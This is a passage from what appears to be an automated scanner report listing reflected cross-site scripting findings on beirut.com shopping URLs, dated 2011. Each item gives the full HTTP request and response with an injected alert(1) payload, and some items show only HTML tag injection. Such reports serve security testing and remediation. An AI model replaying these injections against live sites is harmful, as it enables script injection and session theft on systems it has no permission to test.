The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ce9f'-alert(1)-'3f6bcc13f32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods6ce9f'-alert(1)-'3f6bcc13f32/235690923/Sporting-Goods-Attire/45 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:30:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods6ce9f'-alert(1)-'3f6bcc13f32/235690923/Sporting-Goods-Attire/45';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.922. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0512'-alert(1)-'bbec3fe9042 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923a0512'-alert(1)-'bbec3fe9042/Sporting-Goods-Attire/45 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:34:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods/235690923a0512'-alert(1)-'bbec3fe9042/Sporting-Goods-Attire/45';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.923. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bdc7'-alert(1)-'778dbb87267 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire8bdc7'-alert(1)-'778dbb87267/45 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:41:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire8bdc7'-alert(1)-'778dbb87267/45';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.924. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19a4a'-alert(1)-'923d354c1e8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/4519a4a'-alert(1)-'923d354c1e8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:43:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/4519a4a'-alert(1)-'923d354c1e8';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.925. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4b55"><a>662bc127f70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppinge4b55"><a>662bc127f70/Consumer-Goods/235690923/Sweets-Chocolates/79 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:32:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppinge4b55"><a>662bc127f70">
...[SNIP]...

4.926. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90075'-alert(1)-'1d113cd68f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping90075'-alert(1)-'1d113cd68f2/Consumer-Goods/235690923/Sweets-Chocolates/79 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:40:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping90075'-alert(1)-'1d113cd68f2/Consumer-Goods/235690923/Sweets-Chocolates/79';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.927. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 607ad'-alert(1)-'58a213e0e14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods607ad'-alert(1)-'58a213e0e14/235690923/Sweets-Chocolates/79 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Consumer-Goods607ad'-alert(1)-'58a213e0e14/235690923/Sweets-Chocolates/79';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.928. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d2b42<script>alert(1)</script>eadeef755ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goodsd2b42<script>alert(1)</script>eadeef755ae/235690923/Sweets-Chocolates/79 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:49:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goodsd2b42<script>alert(1)</script>eadeef755ae <a href="#" id="backlink">
...[SNIP]...

4.929. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb469'-alert(1)-'bb51917a62b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923cb469'-alert(1)-'bb51917a62b/Sweets-Chocolates/79 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:54:10 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goods/235690923cb469'-alert(1)-'bb51917a62b/Sweets-Chocolates/79';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.930. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c9a7'-alert(1)-'6b44c7307f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Sweets-Chocolates9c9a7'-alert(1)-'6b44c7307f5/79 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:58:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/235690923/Sweets-Chocolates9c9a7'-alert(1)-'6b44c7307f5/79';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.931. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b77f'-alert(1)-'a9c7223a7f7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Sweets-Chocolates/795b77f'-alert(1)-'a9c7223a7f7 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:03:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods/235690923/Sweets-Chocolates/795b77f'-alert(1)-'a9c7223a7f7';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.932. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Tobacconist/29

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e832c'-alert(1)-'52bb2385ac2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppinge832c'-alert(1)-'52bb2385ac2/Consumer-Goods/235690923/Tobacconist/29 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:36:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shoppinge832c'-alert(1)-'52bb2385ac2/Consumer-Goods/235690923/Tobacconist/29';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.933. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Tobacconist/29

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57c3a"><a>c11e6e3cec5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping57c3a"><a>c11e6e3cec5/Consumer-Goods/235690923/Tobacconist/29 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:25:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
